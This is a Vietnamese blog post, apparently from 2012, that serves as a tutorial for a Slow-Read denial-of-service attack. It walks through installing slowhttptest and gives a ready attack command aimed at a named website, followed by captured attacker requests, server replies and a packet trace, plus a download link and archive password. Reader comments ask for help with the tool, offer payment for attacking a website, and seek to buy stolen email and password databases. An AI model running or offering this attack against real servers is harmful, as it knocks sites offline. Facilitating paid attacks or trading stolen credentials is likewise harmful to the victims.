Slow-Read DoS attack

Có vẻ nguy hiểm hơn slowloris đây đọc qua ở đây:
http://www.hvaonline.net/hvaonline/posts/list/40936.hva thấy hay post tutorial luôn

cài đặt
$ tar -xzvf slowhttptest-x.x.tar.gz

$ cd slowhttptest-x.x

$ ./configure --prefix=PREFIX

$ make

$ sudo make install

sử dụng : slowhttptest -R -u http://huydiet.vn/ -t HEAD -c 1000 -a 10 -b 3000 -r 500

phía attacker:

GET /img/delivery.png HTTP/1.1
Host: victim
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.7.0; U; Edition MacAppStore; en) Presto/2.9.168 Version/11.50

Referer: http://code.google.com/p/slowhttptest/

phía sv trả lại :

HTTP/1.1 200 OK
Date: Mon, 19 Dec 2011 00:12:28 GMT
Server: Apache
Last-Modified: Thu, 08 Dec 2011 15:29:54 GMT
Accept-Ranges: bytes
Content-Length: 24523
Content-Type: image/png
?PNG

cái lý thú ở đây

09:06:02.088947 IP attacker.63643 > victim.http: Flags [S], seq 3550589098, win 65535, options [mss 1460,nop,wscale 1,nop,nop,TS val 796586772 ecr 0,sackOK,eol], length 0
09:06:02.460622 IP victim.http > attacker.63643: Flags [S.], seq 1257718537, ack 3550589099, win 5792, options [mss 1460,sackOK,TS val 595199695 ecr 796586772,nop,wscale 6], length 0
09:06:02.460682 IP attacker.63643 > victim.http: Flags [.], ack 1, win 33304, length 0
09:06:02.460705 IP attacker.63643 > victim.http: Flags [P.], seq 1:219, ack 1, win 33304, length 218 
09:06:02.750771 IP victim.http > attacker.63643: Flags [.], ack 219, win 108, length 0
09:06:02.762162 IP victim.http > attacker.63643: Flags [.], seq 1:1449, ack 219, win 108, length 1448
09:06:02.762766 IP victim.http > attacker.63643: Flags [.], seq 1449:2897, ack 219, win 108, length 1448
09:06:02.762799 IP attacker.63643 > victim.http: Flags [.], ack 2897, win 31856, length 0
...
...
09:06:03.611022 IP victim.http > attacker.63643: Flags [P.], seq 24617:24738, ack 219, win 108, length 121 
09:06:03.611072 IP attacker.63643 > victim.http: Flags [.], ack 24738, win 20935, length 0
09:06:07.757014 IP victim.http > attacker.63643: Flags [F.], seq 24738, ack 219, win 108, length 0
09:06:07.757085 IP attacker.63643 > victim.http: Flags [.], ack 24739, win 20935, length 0
09:09:54.891068 IP attacker.63864 > victim.http: Flags [S], seq 2051163643, win 65535, length 0

Và download tại đây: http://www.mediafire.com/?ft657bt26104jye

Pass unra: huydiet.vn

5 nhận xét:

Phan Thanh Phong nói...: làm cái tut di a; lúc 03:31 24 tháng 2, 2012
Unknown nói...: Sao nó chạy 1 lác là tự stop ak ... có cách nào fix ko a?; lúc 08:02 28 tháng 2, 2012
Unknown nói...: Cái này lợi dụng bug nên bây giờ chắc không còn tác dụng nữa, tiếc thật đang tính làm tools C#; lúc 06:18 12 tháng 3, 2012
Anh Tuấn nói...: Cần tấn công 1 Website, bạn nào có thể thực hiện được vui lòng liên hệ yahoo : bet.vietnam

Tôi sẽ trả chi phí cho công việc

Cám ơn; lúc 23:58 13 tháng 4, 2012
Nặc danh nói...: i BUY need db big usa , uk , de ,su mail + passwrd

i have 143$ PM

ronitarronitar@yahoo.com

skype : ronitarronitar; lúc 01:42 2 tháng 10, 2013

xsky.info

Followers

Slow-Read DoS attack

5 nhận xét:

Đăng nhận xét